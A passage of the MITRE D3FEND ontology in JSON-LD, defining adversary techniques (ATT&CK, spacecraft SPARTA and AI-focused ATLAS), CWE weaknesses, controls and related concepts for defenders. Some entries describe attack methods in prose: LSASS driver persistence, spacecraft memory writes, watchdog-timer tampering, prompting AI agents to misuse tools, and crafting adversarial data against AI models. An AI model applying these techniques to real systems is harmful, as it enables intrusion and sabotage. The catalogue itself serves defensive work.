      "d3f:definition": "Boosting methods can be readily extended to the semi-supervised setting, by introducing pseudo-labeled data after each learning step; which gives rise to the idea of semi-supervised boosting methods. The pseudo-labeling approach of self- training and co-training can be easily extended to boosting methods. Several boosting methods such as SSMBoost, ASSEMBLE, SemiBoost, RegBoost, etc can be found which can be applied for utilizing unlabeled datasets for supervised classifiers.",
      "d3f:kb-article": "## References\nJashish Shrestha. (n.d.). Beginner's Guide to Semi-Supervised Learning. [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/)",
      "rdfs:label": "Semi-supervised Boosting",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-supervisedWrapperMethod"
      }
    },
    {
      "@id": "d3f:Goal",
      "@type": "owl:Class",
      "rdfs:label": "Goal",
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:EX-0012.03",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.03",
      "d3f:definition": "The adversary uses legitimate direct-memory commands or load services to place chosen bytes at chosen addresses. Many spacecraft support raw read/write operations, block loads into RAM or non-volatile stores, and table/file loaders that copy content into working memory. With knowledge of address maps and data structures, an attacker can patch function pointers or vtables, alter limit and configuration records, seed scripts or procedures into interpreter buffers, adjust DMA descriptors, or overwrite portions of executable images resident in RAM. Loads may be sized and paced to fit link and queue constraints, then activated by a subsequent command, mode change, or natural reference by the software.",
      "rdfs:label": "Memory Write/Loads - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Memory Write/Loads"
    },
    {
      "@id": "d3f:T1547.008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.008",
      "d3f:definition": "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)",
      "d3f:may-create": {
        "@id": "d3f:SharedLibraryFile"
      },
      "d3f:modifies": {
        "@id": "d3f:SystemServiceSoftware"
      },
      "rdfs:label": "LSASS Driver",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:Nb89a8ad1bdde400ebb9697294cb81c26"
        },
        {
          "@id": "_:N570be4bdaf5b4685af9e7fd34afa40cf"
        }
      ]
    },
    {
      "@id": "_:Nb89a8ad1bdde400ebb9697294cb81c26",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N570be4bdaf5b4685af9e7fd34afa40cf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemServiceSoftware"
      }
    },
    {
      "@id": "d3f:CWE-574",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-574",
      "d3f:definition": "The product violates the Enterprise JavaBeans (EJB) specification by using thread synchronization primitives.",
      "rdfs:label": "EJB Bad Practices: Use of Synchronization Primitives",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-695"
        },
        {
          "@id": "d3f:CWE-821"
        }
      ]
    },
    {
      "@id": "d3f:instructed-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x instructed-by y: A subject x takes machine instructions from object y.",
      "rdfs:label": "instructed-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Reference-MITREATTACKAuthorizationEnforcement",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://attack.mitre.org/mitigations/M0800/"
      },
      "d3f:kb-abstract": "The device or system should restrict read, manipulate, or execute privileges to only authenticated users who require access based on approved security policies. Role-based Access Control (RBAC) schemes can help reduce the overhead of assigning permissions to the large number of devices within an ICS. For example, IEC 62351 provides examples of roles used to support common system operations within the electric power sector [1], while IEEE 1686 defines standard permissions for users of IEDs.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperatingModeRestriction"
      },
      "d3f:kb-reference-title": "MITRE ATT&CK - Authorization Enforcement",
      "rdfs:label": "Reference - MITRE ATT&CK - Authorization Enforcement"
    },
    {
      "@id": "d3f:CredentialTransmissionScoping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:CredentialTransmissionScoping"
      ],
      "d3f:d3fend-id": "D3-CTS",
      "d3f:definition": "Limiting the transmission of a credential to a scoped set of relying parties.",
      "d3f:isolates": {
        "@id": "d3f:Credential"
      },
      "d3f:kb-reference": {
        "@id": "d3f:Reference-WebAuthentication_AnAPIForAccessingPublicKeyCredentialsLevel2"
      },
      "d3f:synonym": "Phishing Resistant Authentication",
      "rdfs:label": "Credential Transmission Scoping",
      "rdfs:seeAlso": [
        {
          "@id": "https://pages.nist.gov/TIG-Stage/sp800-63c.html"
        },
        {
          "@id": "https://www.w3.org/TR/webauthn-2/"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessMediation"
        },
        {
          "@id": "_:N8f8ae217c4184971b52ad3dc810e1fec"
        }
      ]
    },
    {
      "@id": "_:N8f8ae217c4184971b52ad3dc810e1fec",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:ApplicationInstaller",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An application installer is a user application designed to install, configure, and deploy another application.",
      "rdfs:label": "Application Installer",
      "rdfs:subClassOf": {
        "@id": "d3f:UserApplication"
      }
    },
    {
      "@id": "d3f:CWE-1289",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1289",
      "d3f:definition": "The product receives an input value that is used as a resource identifier or other type of reference, but it does not validate or incorrectly validates that the input is equivalent to a potentially-unsafe value.",
      "rdfs:label": "Improper Validation of Unsafe Equivalence in Input",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-20"
      }
    },
    {
      "@id": "d3f:CWE-1164",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1164",
      "d3f:definition": "The product contains code that is not essential for execution, i.e. makes no state changes and has no side effects that alter data or control flow, such that removal of the code would have no impact to functionality or correctness.",
      "rdfs:label": "Irrelevant Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CWE-301",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-301",
      "d3f:definition": "Simple authentication protocols are subject to reflection attacks if a malicious user can use the target machine to impersonate a trusted user.",
      "rdfs:label": "Reflection Attack in an Authentication Protocol",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:WindowsNtOpenThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Opens a handle to a thread object with the access specified.",
      "rdfs:label": "Windows NtOpenThread",
      "rdfs:seeAlso": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/devnotes/ntopenthread"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPITraceThread"
      }
    },
    {
      "@id": "d3f:EX-0012.11",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0012.11",
      "d3f:definition": "Watchdogs supervise liveness by requiring software to “pet” within defined windows or the system resets. Threat actors manipulate WDT behavior by changing timeout durations, windowed-WDT bounds, reset actions, enable/mask bits, or the source that performs the petting (e.g., moving it into a low-level ISR so higher layers can be stalled indefinitely). Software WDTs can be disabled or starved; hardware WDTs are influenced via control registers, strap pins, or supervisor commands that alter prescalers and reset ladders. Outcomes include preventing intended resets so runaway tasks consume power and bandwidth, or forcing repeated resets at tactically chosen moments, e.g., during updates or handovers, to keep the system in a degraded or easily predictable state. The technique converts a safety mechanism into a tool for either unbounded execution or rhythmic disruption, depending on how the WDT parameters are rewritten.",
      "d3f:modifies": {
        "@id": "d3f:WatchdogTimer"
      },
      "rdfs:label": "Watchdog Timer (WDT) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/11/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0012"
        },
        {
          "@id": "_:Nda4ee909a7c546fbbc987fbbc0f2dc1e"
        }
      ],
      "skos:prefLabel": "Watchdog Timer (WDT)"
    },
    {
      "@id": "_:Nda4ee909a7c546fbbc987fbbc0f2dc1e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WatchdogTimer"
      }
    },
    {
      "@id": "d3f:LogicalRules",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LR",
      "d3f:definition": "A logical rule matches event data or set of values to a conditional expression and results in the determination of a truth value, which may be used to determine the next action or step to take.",
      "d3f:kb-article": "## How it works\n\nLogic rules define a set of patterns that in some patterns must match input data. If the the conditions are met, then the rule will \"fire\" and some action will be taken, usually notifying a person or another system that the event being monitored needs further processing or attention.\n\n## Key Test Considerations\n\n- **Performance (Accuracy)** Identify instances in data where rule is expected to be triggered. Implement traceability and metrics for individual rule performance. Traceability of cases could be implemented as unit tests or as part of a fine-grained classification performance platform. For simple rule-based matching systems with many rules, individual rules may be unused or may create unusually high false positives (or false negatives relative to expectation.\n\n- **Performance (Computational)** Generate model performance measures (see Classification Performance Measures), esp. a confusion matrix for each rule and identify outliers and relative contribution of rule to overall performance.\n\n## References\n1. Event condition action. (2019, Nov 21). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Event_condition_action).\n2. Business rule. (2023, April 10). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Business_rule).\n3. YARA. (2023, June 5). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/YARA).",
      "rdfs:label": "Logical Rules",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicLogic"
      }
    },
    {
      "@id": "d3f:CWE-603",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-603",
      "d3f:definition": "A client/server product performs authentication within client code but not in server code, allowing server-side authentication to be bypassed via a modified client that omits the authentication check.",
      "rdfs:label": "Use of Client-Side Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1390"
        },
        {
          "@id": "d3f:CWE-602"
        }
      ]
    },
    {
      "@id": "d3f:CCI-000663_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:ExecutionIsolation"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization (or information system) enforces explicit rules governing the installation of software by users.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-000663"
    },
    {
      "@id": "d3f:CWE-322",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-322",
      "d3f:definition": "The product performs a key exchange with an actor without verifying the identity of that actor.",
      "rdfs:label": "Key Exchange without Entity Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-306"
      }
    },
    {
      "@id": "d3f:LinuxOpenArgumentO_RDONLY-O_WRONLY-O_RDWR",
      "@type": "owl:Class",
      "d3f:definition": "Opens a file specified by pathname.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/open.2.html"
      },
      "rdfs:label": "Linux Open Argument O_RDONLY, O_WRONLY, O_RDWR",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIOpenFile"
      }
    },
    {
      "@id": "d3f:JobSchedule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:ScheduledJob"
      },
      "d3f:definition": "A job schedule contains specification of tasks to be executed at particular times or time intervals.  The schedule is a plan that enacted by a task scheduling process. In Windows, the schedule can be accessed at 'C:\\Windows\\System32\\Tasks' or in the registry. In Linux, the schedule is located at '/etc/crontab'",
      "d3f:modified-by": {
        "@id": "d3f:JobSchedulerSoftware"
      },
      "d3f:synonym": "Task Schedule",
      "rdfs:label": "Job Schedule",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Cron"
        },
        {
          "@id": "dbr:Windows_Task_Scheduler"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformation"
        },
        {
          "@id": "_:N9118da452ebd4902b41296b57e753c7d"
        },
        {
          "@id": "_:N630a4569e41445f3adb08b01176cc334"
        }
      ]
    },
    {
      "@id": "_:N9118da452ebd4902b41296b57e753c7d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJob"
      }
    },
    {
      "@id": "_:N630a4569e41445f3adb08b01176cc334",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modified-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JobSchedulerSoftware"
      }
    },
    {
      "@id": "d3f:AML.T0085.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0085.001",
      "d3f:definition": "Adversaries may prompt the AI service to invoke various tools the agent has access to. Tools may retrieve data from different APIs or services in an organization.",
      "rdfs:label": "AI Agent Tools - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0085.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0085"
      },
      "skos:prefLabel": "AI Agent Tools"
    },
    {
      "@id": "d3f:PhysicalLock",
      "@type": "owl:Class",
      "d3f:definition": "A lock is a mechanical latching device for securing moveable portions of physical barriers in a secured position.",
      "rdfs:label": "Physical Lock",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Lock_and_key"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PhysicalArtifact"
      }
    },
    {
      "@id": "d3f:CWE-348",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-348",
      "d3f:definition": "The product has two different sources of the same data or information, but it uses the source that has less support for verification, is less trusted, or is less resistant to attack.",
      "rdfs:label": "Use of Less Trusted Source",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:T1125",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": [
        {
          "@id": "d3f:DigitalCamera"
        },
        {
          "@id": "d3f:VideoInputDevice"
        }
      ],
      "d3f:attack-id": "T1125",
      "d3f:definition": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.",
      "rdfs:label": "Video Capture",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:N2d3ae80a3619454b8873fe08e2b9e5df"
        },
        {
          "@id": "_:Nb18ad1012e54446da5e984449d7d9590"
        }
      ]
    },
    {
      "@id": "_:N2d3ae80a3619454b8873fe08e2b9e5df",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalCamera"
      }
    },
    {
      "@id": "_:Nb18ad1012e54446da5e984449d7d9590",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VideoInputDevice"
      }
    },
    {
      "@id": "d3f:may-corrupt",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-corrupt y: They entity x may corrupt y's information content; that is, 'x corrupts y' may be true.",
      "rdfs:label": "may-corrupt",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:CWE-1275",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1275",
      "d3f:definition": "The SameSite attribute for sensitive cookies is not set, or an insecure value is used.",
      "rdfs:label": "Sensitive Cookie with Improper SameSite Attribute",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-923"
      }
    },
    {
      "@id": "d3f:AML.T0011.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0011.000",
      "d3f:definition": "Adversaries may develop unsafe AI artifacts that when executed have a deleterious effect.\nThe adversary can use this technique to establish persistent access to systems.\nThese models may be introduced via a [AI Supply Chain Compromise](/techniques/AML.T0010).\n\nSerialization of models is a popular technique for model storage, transfer, and loading.\nHowever, this format without proper checking presents an opportunity for code execution.",
      "rdfs:label": "Unsafe AI Artifacts - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0011.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0011"
      },
      "skos:prefLabel": "Unsafe AI Artifacts"
    },
    {
      "@id": "d3f:T1054",
      "@type": "owl:Class",
      "d3f:attack-id": "T1054",
      "d3f:definition": "An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1086) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1562.006",
      "rdfs:label": "Indicator Blocking",
      "rdfs:seeAlso": {
        "@id": "d3f:T1562.006"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:AML.T0043",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0043",
      "d3f:definition": "Adversarial data are inputs to an AI model that have been modified such that they cause the adversary's desired effect in the target model.\nEffects can range from misclassification, to missed detections, to maximizing energy consumption.\nTypically, the modification is constrained in magnitude or location so that a human still perceives the data as if it were unmodified, but human perceptibility may not always be a concern depending on the adversary's intended effect.\nFor example, an adversarial input for an image classification task is an image the AI model would misclassify, but a human would still recognize as containing the correct class.\n\nDepending on the adversary's knowledge of and access to the target model, the adversary may use different classes of algorithms to develop the adversarial example such as [White-Box Optimization](/techniques/AML.T0043.000), [Black-Box Optimization](/techniques/AML.T0043.001), [Black-Box Transfer](/techniques/AML.T0043.002), or [Manual Modification](/techniques/AML.T0043.003).\n\nThe adversary may [Verify Attack](/techniques/AML.T0042) their approach works if they have white-box or inference API access to the model.\nThis allows the adversary to gain confidence their attack is effective \"live\" environment where their attack may be noticed.\nThey can then use the attack at a later time to accomplish their goals.\nAn adversary may optimize adversarial examples for [Evade AI Model](/techniques/AML.T0015), or to [Erode AI Model Integrity](/techniques/AML.T0031).",
      "rdfs:label": "Craft Adversarial Data - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0043"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASAIAttackStagingTechnique"
      },
      "skos:prefLabel": "Craft Adversarial Data"
    },
    {
      "@id": "d3f:CWE-684",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-684",
      "d3f:definition": "The code does not function according to its published specifications, potentially leading to incorrect usage.",
      "rdfs:label": "Incorrect Provision of Specified Functionality",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:T1533",
      "@type": "owl:Class",
      "d3f:attack-id": "T1533",
      "d3f:definition": "Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to exfiltration.",
      "rdfs:label": "Data from Local System - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Data from Local System"
    },
    {
      "@id": "d3f:CWE-303",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-303",
      "d3f:definition": "The requirements for the product dictate the use of an established authentication algorithm, but the implementation of the algorithm is incorrect.",
      "rdfs:label": "Incorrect Implementation of Authentication Algorithm",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:WindowsNtWriteFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Writes data to an open file.",
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntwritefile"
      },
      "rdfs:label": "Windows NtWriteFile",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIWriteFile"
      }
    },
    {
      "@id": "d3f:DiscriminantAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DA",
      "d3f:definition": "Discriminant analysis attempts to establish whether a set of variables can be used to distinguish between two or more groups of cases.",
      "d3f:kb-article": "## References\nWikipedia. (n.d.). Multivariate statistics. [Link](https://en.wikipedia.org/wiki/Multivariate_statistics)",
      "rdfs:label": "Discriminant Analysis",
      "rdfs:subClassOf": {
        "@id": "d3f:MultivariateAnalysis"
      }
    },
    {
      "@id": "d3f:Reference-HostDiscoveryCommands_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2016-03-001/"
      },
      "d3f:kb-abstract": "When entering on a host for the first time, an adversary may try to discover information about the host. There are several built-in Windows commands that can be used to learn about the software configurations, active users, administrators, and networking configuration. These commands should be monitored to identify when an adversary is learning information about the system and environment. The information returned may impact choices an adversary can make when establishing persistence, escalating privileges, or moving laterally.\n\nBecause these commands are built in, they may be run frequently by power users or even by normal users. Thus, an analytic looking at this information should have well-defined white- or blacklists, and should consider looking at an anomaly detection approach, so that this information can be learned dynamically.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2016-03-001: Host Discovery Commands",
      "rdfs:label": "Reference - CAR-2016-03-001: Host Discovery Commands - MITRE"
    },
    {
      "@id": "d3f:Plan",
      "@type": "owl:Class",
      "rdfs:label": "Plan",
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:T1547.012",
      "@type": "owl:Class",
      "d3f:attack-id": "T1547.012",
      "d3f:definition": "Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print Processors)",
      "rdfs:label": "Print Processors",
      "rdfs:subClassOf": {
        "@id": "d3f:T1547"
      }
    },
    {
      "@id": "d3f:SPARTAImpactTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0009"
      },
      "rdfs:label": "Impact Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:Naa0de76286f64d6f8875fbad33d9aefe"
        }
      ],
      "skos:prefLabel": "Impact Technique"
    },
    {
      "@id": "_:Naa0de76286f64d6f8875fbad33d9aefe",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0009"
      }
    },
    {
      "@id": "d3f:CWE-1061",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1061",
      "d3f:definition": "The product does not sufficiently hide the internal representation and implementation details of data or methods, which might allow external components or modules to modify data unexpectedly, invoke unexpected functionality, or introduce dependencies that the programmer did not intend.",
      "rdfs:label": "Insufficient Encapsulation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "skos:example",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:Technique",
      "@type": "owl:Class",
      "rdfs:label": "Technique",
      "rdfs:subClassOf": {
        "@id": "d3f:Plan"
      }
    },
    {
      "@id": "d3f:CWE-372",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-372",
      "d3f:definition": "The product does not properly determine which state it is in, causing it to assume it is in state X when in fact it is in state Y, causing it to perform incorrect operations in a security-relevant manner.",
      "rdfs:label": "Incomplete Internal State Distinction",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CCI-000382_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:PlatformHardening"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization configures the information system to prohibit or restrict the use of organization-defined functions, ports, protocols, and/or services.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-18T00:00:00"
      },
      "rdfs:label": "CCI-000382"
    },
    {
      "@id": "d3f:T1040",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1040",
      "d3f:definition": "Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.",
      "d3f:may-produce": {
        "@id": "d3f:DNSLookup"
      },
      "rdfs:label": "Network Sniffing",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:N19a58bd394504648be24449e035d973c"
        }
      ]
    },
    {
      "@id": "_:N19a58bd394504648be24449e035d973c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-produce"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DNSLookup"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_15",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Detection of Unsanctioned Information",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(15)"
    },
    {
      "@id": "d3f:CWE-404",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-404",
      "d3f:definition": "The product does not release or incorrectly releases a resource before it is made available for re-use.",
      "rdfs:label": "Improper Resource Shutdown or Release",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:T1602.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1602.002",
      "d3f:definition": "Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.",
      "rdfs:label": "Network Device Configuration Dump",
      "rdfs:subClassOf": {
        "@id": "d3f:T1602"
      }
    },
    {
      "@id": "d3f:AddUserToGroupEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a user is added to a group, granting the user the permissions and privileges associated with the group.",
      "rdfs:label": "Add User to Group Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:GroupManagementEvent"
        },
        {
          "@id": "_:Nda2bd42d8f084afda5752eb7351e3e3b"
        },
        {
          "@id": "_:N1c70aede12834e718944a00e20cf0145"
        },
        {
          "@id": "_:Nab1a10d68539441d81160a1762061fa3"
        }
      ]
    },
    {
      "@id": "_:Nda2bd42d8f084afda5752eb7351e3e3b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "_:N1c70aede12834e718944a00e20cf0145",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GroupCreationEvent"
      }
    },
    {
      "@id": "_:Nab1a10d68539441d81160a1762061fa3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountCreationEvent"
      }
    },
    {
      "@id": "d3f:OutboundInternetEncryptedRemoteTerminalTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Outbound internet encrypted remote terminal traffic is encrypted network traffic for a standard remote terminal protocol on an outgoing connection initiated from a host within a network to a host outside the network.",
      "rdfs:label": "Outbound Internet Encrypted Remote Terminal Traffic",
      "rdfs:subClassOf": {
